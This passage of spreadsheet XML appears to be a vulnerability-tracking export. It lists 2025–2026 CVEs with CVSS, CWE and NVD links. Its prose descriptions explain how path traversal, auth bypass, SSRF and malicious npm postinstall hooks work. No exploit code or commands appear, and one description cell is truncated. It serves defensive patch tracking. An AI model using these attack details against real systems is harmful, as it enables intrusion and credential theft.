      <c r="L408" s="5" t="inlineStr">
        <is>
          <t>better-auth (npm) before 1.4.2 allows an external request to configure baseURL when it is not otherwise defined (e.g., BETTER_AUTH_URL is unset). An attacker able to make the very first request to the server after startup can poison the router's base path, causing all routes to return 404 for all users (denial of service). The issue is not reachable when baseURL is explicitly configured or on typical managed hosting platforms.</t>
        </is>
      </c>
      <c r="M408" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-71401</t>
        </is>
      </c>
    </row>
    <row r="409">
      <c r="A409" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B409" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15378</t>
        </is>
      </c>
      <c r="C409" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D409" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E409" s="5" t="inlineStr"/>
      <c r="F409" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G409" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H409" s="5" t="inlineStr"/>
      <c r="I409" s="5" t="inlineStr">
        <is>
          <t>2026-07-10</t>
        </is>
      </c>
      <c r="J409" s="5" t="inlineStr"/>
      <c r="K409" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L409" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the `guardrails-detectors` component. This vulnerability allows a remote attacker to perform a blind Server-Side Request Forgery (SSRF) by submitting a specially crafted XML Schema Definition (XSD) string. This can lead to unauthorized access to sensitive information, including credentials from cloud metadata services, Kubernetes API, internal MinIO, and other internal network endpoints. Additionally, it enables local file reads of critical data such as service account tokens and pod secrets.</t>
        </is>
      </c>
      <c r="M409" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15378</t>
        </is>
      </c>
    </row>
    <row r="410">
      <c r="A410" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B410" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16876</t>
        </is>
      </c>
      <c r="C410" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D410" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E410" s="5" t="inlineStr"/>
      <c r="F410" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G410" s="5" t="inlineStr"/>
      <c r="H410" s="5" t="inlineStr"/>
      <c r="I410" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J410" s="5" t="inlineStr"/>
      <c r="K410" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L410" s="5" t="inlineStr">
        <is>
          <t>An authentication bypass vulnerability exists in the WebGUI of Series UNIVERGE IX-R/IX-V. A user could bypass authentication and execute arbitrary CLI commands by tampering with WebGUI messages and sending them to the device via internet.</t>
        </is>
      </c>
      <c r="M410" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16876</t>
        </is>
      </c>
    </row>
    <row r="411">
      <c r="A411" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B411" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19264</t>
        </is>
      </c>
      <c r="C411" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D411" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E411" s="5" t="inlineStr"/>
      <c r="F411" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G411" s="5" t="inlineStr"/>
      <c r="H411" s="5" t="inlineStr"/>
      <c r="I411" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J411" s="5" t="inlineStr"/>
      <c r="K411" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L411" s="5" t="inlineStr">
        <is>
          <t>Postiz is an open-source social media scheduling tool. The route that serves locally stored media joins URL-supplied path segments onto the upload directory and streams the file without normalising the path or confining it to that directory, and the route requires no authentication. Raw dot-segments are collapsed before routing, but URL-encoded separators survive route matching and are decoded only once they reach the handler, restoring the traversal at the filesystem call. An unauthenticated remote attacker can therefore read any file readable by the application process, including the process environment, which exposes the JWT signing secret, the database connection string, and connected provider and billing secrets. Because session tokens are signed with that secret and carry no expiry, this allows forging a non-expiring session as any user, including an administrator, without a password.</t>
        </is>
      </c>
      <c r="M411" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19264</t>
        </is>
      </c>
    </row>
    <row r="412">
      <c r="A412" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B412" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21102</t>
        </is>
      </c>
      <c r="C412" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D412" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E412" s="5" t="inlineStr"/>
      <c r="F412" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G412" s="5" t="inlineStr"/>
      <c r="H412" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="I412" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J412" s="5" t="inlineStr"/>
      <c r="K412" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L412" s="5" t="inlineStr">
        <is>
          <t>Use after free in DualDAR prior to SMR Sep-2026 Release 1 allows local privileged attackers to execute arbitrary code with root privilege.</t>
        </is>
      </c>
      <c r="M412" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21102</t>
        </is>
      </c>
    </row>
    <row r="413">
      <c r="A413" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B413" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-25896</t>
        </is>
      </c>
      <c r="C413" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D413" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E413" s="5" t="inlineStr"/>
      <c r="F413" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G413" s="5" t="inlineStr"/>
      <c r="H413" s="5" t="inlineStr">
        <is>
          <t>naturalintelligence:fast-xml-parser</t>
        </is>
      </c>
      <c r="I413" s="5" t="inlineStr">
        <is>
          <t>2026-02-20</t>
        </is>
      </c>
      <c r="J413" s="5" t="inlineStr"/>
      <c r="K413" s="5" t="inlineStr">
        <is>
          <t>CWE-185, CWE-79</t>
        </is>
      </c>
      <c r="L413" s="5" t="inlineStr">
        <is>
          <t>fast-xml-p</t>
        </is>
      </c>
      <c r="M413" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-25896</t>
        </is>
      </c>
    </row>
    <row r="414">
      <c r="A414" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B414" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41452</t>
        </is>
      </c>
      <c r="C414" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D414" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E414" s="5" t="inlineStr"/>
      <c r="F414" s="5" t="n">
        <v>0.025</v>
      </c>
      <c r="G414" s="5" t="inlineStr"/>
      <c r="H414" s="5" t="inlineStr"/>
      <c r="I414" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J414" s="5" t="inlineStr"/>
      <c r="K414" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L414" s="5" t="inlineStr">
        <is>
          <t>Krayin CRM 2.2.4 contains a missing authentication vulnerability in the installer middleware that allows unauthenticated remote attackers to overwrite the primary administrator account by sending a crafted HTTP POST request with the X-Requested-With: XMLHttpRequest header to bypass the CanInstall middleware redirect check. Attackers can supply arbitrary name, email, and password values to the admin-config-setup endpoint, which performs an unauthenticated updateOrInsert targeting the hardcoded administrator user ID, enabling full administrative access to all CRM data.</t>
        </is>
      </c>
      <c r="M414" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41452</t>
        </is>
      </c>
    </row>
    <row r="415">
      <c r="A415" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B415" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44402</t>
        </is>
      </c>
      <c r="C415" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D415" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E415" s="5" t="inlineStr"/>
      <c r="F415" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G415" s="5" t="inlineStr"/>
      <c r="H415" s="5" t="inlineStr"/>
      <c r="I415" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J415" s="5" t="inlineStr"/>
      <c r="K415" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L415" s="5" t="inlineStr">
        <is>
          <t>Voltronic Power SNMP Web Pro 1.1 contains an unauthenticated remote code execution vulnerability in the upload.cgi firmware update endpoint that allows remote attackers to execute arbitrary commands as root by uploading a crafted tar archive without valid credentials. Attackers can supply a malicious tar archive containing arbitrary executable files that are extracted to a privileged directory and executed as root, achieving full system compromise.</t>
        </is>
      </c>
      <c r="M415" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44402</t>
        </is>
      </c>
    </row>
    <row r="416">
      <c r="A416" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B416" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44990</t>
        </is>
      </c>
      <c r="C416" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D416" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E416" s="5" t="inlineStr"/>
      <c r="F416" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G416" s="5" t="inlineStr">
        <is>
          <t>java, node.js</t>
        </is>
      </c>
      <c r="H416" s="5" t="inlineStr"/>
      <c r="I416" s="5" t="inlineStr">
        <is>
          <t>2026-06-12</t>
        </is>
      </c>
      <c r="J416" s="5" t="inlineStr"/>
      <c r="K416" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L416" s="5" t="inlineStr">
        <is>
          <t>ApostropheCMS is an open-source Node.js content management system, and sanitize-html provides a simple HTML sanitizer with a clear API. Under the default configuration, versions of `sanitize-html` prior to 2.17.4 can turn attacker-controlled content inside a disallowed `xmp` element into live HTML or JavaScript. This is a sanitizer bypass in the default `disallowedTagsMode: 'discard'` path and can lead to stored XSS in applications that render sanitized output back to users. Version 2.17.4 patches the issue.</t>
        </is>
      </c>
      <c r="M416" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44990</t>
        </is>
      </c>
    </row>
    <row r="417">
      <c r="A417" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B417" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45118</t>
        </is>
      </c>
      <c r="C417" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D417" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E417" s="5" t="inlineStr"/>
      <c r="F417" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G417" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H417" s="5" t="inlineStr"/>
      <c r="I417" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J417" s="5" t="inlineStr"/>
      <c r="K417" s="5" t="inlineStr">
        <is>
          <t>CWE-83</t>
        </is>
      </c>
      <c r="L417" s="5" t="inlineStr">
        <is>
          <t>MyBB is free and open source forum software. Prior to 1.8.40, the Contact module does not validate a redirect URL or protocol correctly, resulting in an open redirect and reflected JavaScript code injection. contact.php accepts the redirect target from the from HTTP parameter in $mybb-&gt;input['from'] or the Referer HTTP header in $_SERVER['HTTP_REFERER'] and passes it to redirect() without sufficient verification. A javascript: URI becomes the target of the `Click here if you don't want to wait any longer` link because $force_redirect is true, allowing script execution when a victim selects the link. This issue is fixed in version 1.8.40.</t>
        </is>
      </c>
      <c r="M417" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45118</t>
        </is>
      </c>
    </row>
    <row r="418">
      <c r="A418" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B418" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-4599</t>
        </is>
      </c>
      <c r="C418" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D418" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E418" s="5" t="inlineStr"/>
      <c r="F418" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G418" s="5" t="inlineStr"/>
      <c r="H418" s="5" t="inlineStr">
        <is>
          <t>kjur:jsrsasign</t>
        </is>
      </c>
      <c r="I418" s="5" t="inlineStr">
        <is>
          <t>2026-03-23</t>
        </is>
      </c>
      <c r="J418" s="5" t="inlineStr"/>
      <c r="K418" s="5" t="inlineStr">
        <is>
          <t>CWE-1023, CWE-338</t>
        </is>
      </c>
      <c r="L418" s="5" t="inlineStr">
        <is>
          <t>Versions of the package jsrsasign from 7.0.0 and before 11.1.1 are vulnerable to Incomplete Comparison with Missing Factors via the getRandomBigIntegerZeroToMax and getRandomBigIntegerMinToMax functions in src/crypto-1.1.js; an attacker can recover the private key by exploiting the incorrect compareTo checks that accept out-of-range candidates and thus bias DSA nonces during signature generation.</t>
        </is>
      </c>
      <c r="M418" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-4599</t>
        </is>
      </c>
    </row>
    <row r="419">
      <c r="A419" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B419" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47156</t>
        </is>
      </c>
      <c r="C419" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D419" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E419" s="5" t="inlineStr"/>
      <c r="F419" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G419" s="5" t="inlineStr"/>
      <c r="H419" s="5" t="inlineStr"/>
      <c r="I419" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J419" s="5" t="inlineStr"/>
      <c r="K419" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-639</t>
        </is>
      </c>
      <c r="L419" s="5" t="inlineStr">
        <is>
          <t>MantisBT is an open source bug tracker. Versions 2.28.3 and earlier contain a critical authentication bypass in the SOAP API's mci_check_login() function. Any user knowing any valid cookie_string can authenticate as any other user (knowing their username), including the administrator, without knowing the target's password. The vulnerability is exploitable with zero prior access on default MantisBT installations because self-registration is enabled by default ($g_allow_signup = ON). A self-registered user can use their own cookie_string (readable from their browser's MANTIS_STRING_COOKIE cookie after login) to impersonate the administrator via the SOAP API. The REST API is NOT affected. The REST API's AuthMiddleware derives the username server-side from the API token or session cookie, so the username cannot be spoofed. The Web UI is NOT affected. The Web UI authenticates via PHP session cookies (PHPSESSID) and validates the MANTIS_STRING_COOKIE against the logged-in user through auth_is_cookie_valid(). The username is derived server-side from the cookie, not supplied by the client. Version 2.28.4 contains a patch. No known workarounds are available.</t>
        </is>
      </c>
      <c r="M419" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47156</t>
        </is>
      </c>
    </row>
    <row r="420">
      <c r="A420" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B420" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47187</t>
        </is>
      </c>
      <c r="C420" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D420" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E420" s="5" t="inlineStr"/>
      <c r="F420" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G420" s="5" t="inlineStr"/>
      <c r="H420" s="5" t="inlineStr"/>
      <c r="I420" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J420" s="5" t="inlineStr"/>
      <c r="K420" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L420" s="5" t="inlineStr">
        <is>
          <t>SSHFS is a network filesystem client for connecting to SSH servers. Prior to version 3.7.6, a rogue SFTP server can return absolute symlink targets or relative targets containing parent-directory components that SSHFS passes through FUSE for resolution by the client kernel against the local filesystem. The documented transform_symlinks mitigation does not contain relative targets because transform_symlink() returns early at sshfs.c:2181, while sshfs_readlink() at sshfs.c:2234 to sshfs.c:2236 otherwise copies the server-supplied link target to the kernel. A victim or victim-side tool that follows such a link through ordinary operations such as cp, rsync, backup tooling, or an editor can disclose readable local files back to the server or write server-controlled content to writable local files, potentially including startup or scheduled-task files. This issue is fixed in version 3.7.6.</t>
        </is>
      </c>
      <c r="M420" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47187</t>
        </is>
      </c>
    </row>
    <row r="421">
      <c r="A421" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B421" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47754</t>
        </is>
      </c>
      <c r="C421" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D421" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E421" s="5" t="inlineStr"/>
      <c r="F421" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G421" s="5" t="inlineStr">
        <is>
          <t>java, tomcat</t>
        </is>
      </c>
      <c r="H421" s="5" t="inlineStr"/>
      <c r="I421" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J421" s="5" t="inlineStr"/>
      <c r="K421" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-862</t>
        </is>
      </c>
      <c r="L421" s="5" t="inlineStr">
        <is>
          <t>Metacat is data repository software that helps researchers preserve, share, and discover data. Versions 2.x through 2.19.1 and all 1.x versions contain an unauthenticated path traversal in the `archiveEntryName` parameter of the `action=read` endpoint that is part of the original 1.x Metacat API. `ArchiveHandler.readArchiveEntry()` concatenates the user-supplied parameter into a filesystem path without validation, and the surrounding `hasReadPermission()` check is commented out. An unauthenticated remote attacker can read any file accessible to the Tomcat process by sending a single GET request. Proof-of-concept exploits have been demonstrated and verified against this vulnerability, and it should be considered easily exploitable for any Metacat deployment &lt; 3.0.0 by any user with access to the 1.x API. Through this vulnerability, production 2.x deployments are exposed to credential theft, client certificate and private key exfiltration enabling member node impersonation within the federation, embargoed research data disclosure, and broad system reconnaissance. Given Metacat's deployment footprint across the DataONE network of repositories and federally funded research programs, the population of exposed 2.x instances is non-trivial. The vulnerability was eliminated in Metacat version 3.0.0 and after by eliminating the entire Metacat 1.x API that exposed this vulnerability. The vulnerability was remediated in April 2024 with the release of Metacat 3.0.0, which removed the legacy Metacat API including ArchiveHandler.java. The commit message and issue reference architectural cleanup, not a security fix, and no advisory or CVE was issued. The 2.x branch was not and will not be backported, as is standard practice in Metacat, which only supports the most current release. 2.19.1 remains vulnerable with identical code and is beyond its supported lifetime. As a workaround, disable or restrict 1.x API servlets. Because the vulnerable 1.x API is no longer used or necessary in most Metacat deployments, restricting access to the old API endpoints can reduce or eliminate exposure for 2.19.x deployments.  After removing those features, restart Tomcat or whichever software is hosting the servlets.</t>
        </is>
      </c>
      <c r="M421" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47754</t>
        </is>
      </c>
    </row>
    <row r="422">
      <c r="A422" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B422" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48046</t>
        </is>
      </c>
      <c r="C422" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D422" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E422" s="5" t="inlineStr"/>
      <c r="F422" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G422" s="5" t="inlineStr"/>
      <c r="H422" s="5" t="inlineStr"/>
      <c r="I422" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J422" s="5" t="inlineStr"/>
      <c r="K422" s="5" t="inlineStr">
        <is>
          <t>CWE-494</t>
        </is>
      </c>
      <c r="L422" s="5" t="inlineStr">
        <is>
          <t>Streambert is a cross-platform Electron Desktop App to stream and download video content. Versions prior to 2.5.0 contain an unvalidated auto-updater URL vulnerability that allows a compromised renderer process to make the main process download and execute an arbitrary binary, resulting in remote code execution. Version 2.5.0 contains a patch.</t>
        </is>
      </c>
      <c r="M422" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48046</t>
        </is>
      </c>
    </row>
    <row r="423">
      <c r="A423" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B423" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48063</t>
        </is>
      </c>
      <c r="C423" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D423" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E423" s="5" t="inlineStr"/>
      <c r="F423" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G423" s="5" t="inlineStr">
        <is>
          <t>java, sap</t>
        </is>
      </c>
      <c r="H423" s="5" t="inlineStr"/>
      <c r="I423" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J423" s="5" t="inlineStr"/>
      <c r="K423" s="5" t="inlineStr">
        <is>
          <t>CWE-290, CWE-345, CWE-346</t>
        </is>
      </c>
      <c r="L423" s="5" t="inlineStr">
        <is>
          <t>Baileys is a cocket-based TS/JavaScript API for WhatsApp Web. In versions prior to both 6.7.22 and 7.0.0-rc12, any Baileys session  can be sent a malicious payload via the placeholderResendMessage and trigger a fake messages.upsert event with a fake message key and payload. This allows anyone to spoof messages. The same exploit also allows an attacker to corrupt the app state sync system by sending fake key shares, and also allows for history sync spoofing which also serves the same problem, injecting fake previous context or "on-demand" sync. This issue has been fixed in versions 6.7.22 and 7.0.0-rc12.</t>
        </is>
      </c>
      <c r="M423" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48063</t>
        </is>
      </c>
    </row>
    <row r="424">
      <c r="A424" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B424" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48158</t>
        </is>
      </c>
      <c r="C424" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D424" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E424" s="5" t="inlineStr"/>
      <c r="F424" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G424" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H424" s="5" t="inlineStr"/>
      <c r="I424" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J424" s="5" t="inlineStr"/>
      <c r="K424" s="5" t="inlineStr">
        <is>
          <t>CWE-506</t>
        </is>
      </c>
      <c r="L424" s="5" t="inlineStr">
        <is>
          <t>use-context-selector is a React useContextSelector hook in userland Between 2026-05-18 15:57:18 and 2026-05-19 15:24:34, the default branch contained malicious commits 9d8481a513b7b0d1c0941b220c69b25de748641b through 6f2dae054ca014068bdbbb4db96006424d674124 that executed remote attacker-controlled code on developer machines during
`npm install`. The commits were removed by force-push, but local clones, forks, and direct-SHA URLs may still contain them, and `npm install` against an affected checkout will still execute the code today. The package was not published to npm. `src/install.js` was added and wired into the `postinstall` script. It fetched a JavaScript payload from an attacker-controlled HTTPS endpoint (configurable via an environment variable), disabled TLS verification, and evaluated the response as code with `require` available. Execution was deliberately skipped on CI and cloud/serverless environments, targeting developer workstations. The second-stage payload was attacker-hosted and cannot be reconstructed. Assume full compromise of anything reachable from a Node process with the user's permissions. Those who ran `npm install` against an affected checkout on a developer machine on or after 2026-05-18 15:57:18 should treat the machine as compromised, rotate every credential the machine could reach, audit account activity** since 2026-05-18 15:57:18, and clean local clones.</t>
        </is>
      </c>
      <c r="M424" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48158</t>
        </is>
      </c>
    </row>
    <row r="425">
      <c r="A425" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B425" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48159</t>
        </is>
      </c>
      <c r="C425" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D425" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E425" s="5" t="inlineStr"/>
      <c r="F425" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G425" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H425" s="5" t="inlineStr"/>
      <c r="I425" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J425" s="5" t="inlineStr"/>
      <c r="K425" s="5" t="inlineStr">
        <is>
          <t>CWE-506</t>
        </is>
      </c>
      <c r="L425" s="5" t="inlineStr">
        <is>
          <t>use-reducer-async is a React useReducer with async actions. Between 2026-05-18 16:29:52 and 2026-05-19 15:26:07, the default branch contained malicious commits da72edbde5705efcec6c62e0a3dcb73687b78dc8 through df07d5711458d8b46e11dd7afaaa21e88cafabfb that executed remote attacker-controlled code on developer machines during `npm install`. The commits were removed by force-push, but local clones, forks, and direct-SHA URLs may still contain them, and `npm install` against an affected checkout will still execute the code today. The package was not published to npm. `src/install.js` was added and wired into the `postinstall` script. It fetched a JavaScript payload from an attacker-controlled HTTPS endpoint (configurable via an environment variable), disabled TLS verification, and evaluated the response as code with `require` available. Execution was deliberately skipped on CI and cloud/serverless environments, targeting developer workstations. The second-stage payload was attacker-hosted and cannot be reconstructed. Assume full compromise of anything reachable from a Node process with the user's permissions. Those who ran `npm install` against an affected checkout on a developer machine on or after 2026-05-18 16:29:52 should treat the machine as compromised, rotate every credential the machine could reach, audit account activity since 2026-05-18 16:29:52, and clean local clones.</t>
        </is>
      </c>
      <c r="M425" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48159</t>
        </is>
      </c>
    </row>
    <row r="426">
      <c r="A426" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B426" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48160</t>
        </is>
      </c>
      <c r="C426" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D426" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E426" s="5" t="inlineStr"/>
      <c r="F426" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G426" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H426" s="5" t="inlineStr"/>
      <c r="I426" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J426" s="5" t="inlineStr"/>
      <c r="K426" s="5" t="inlineStr">
        <is>
          <t>CWE-506</t>
        </is>
      </c>
      <c r="L426" s="5" t="inlineStr">
        <is>
          <t>react-tracked provides state usage tracking with Proxies. Between 2026-05-18 19:26:36 and 2026-05-19 15:22:45, the default branch contained malicious commits 6978272a7d6ca02225cb747ea69f427512e33699 through 949f1a3d6bb1ff7d1a0dec892afd773e742627e8 that executed remote attacker-controlled code on developer machines during `npm install`. The commits were removed by force-push, but local clones, forks, and direct-SHA URLs may still contain them, and `npm install` against an affected checkout will still execute the code today. The package was not published to npm. `src/install.js` was added and wired into the `postinstall` script. It fetched a JavaScript payload from an attacker-controlled HTTPS endpoint (configurable via an environment variable), disabled TLS verification, and evaluated the response as code with `require` available. Execution was deliberately skipped on CI and cloud/serverless environments, targeting developer workstations. The second-stage payload was attacker-hosted and cannot be reconstructed. Assume full compromise of anything reachable from a Node process with the user's permissions. Those who ran `npm install` against an affected checkout on a developer machine on or after 2026-05-18 19:26:36 should treat the machine as compromised, rotate every credential the machine could reach, audit account activity** since 2026-05-18 19:26:36, and clean local clones.</t>
        </is>
      </c>
      <c r="M426" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48160</t>
        </is>
      </c>
    </row>
    <row r="427">
      <c r="A427" s="5" t="inlineStr">
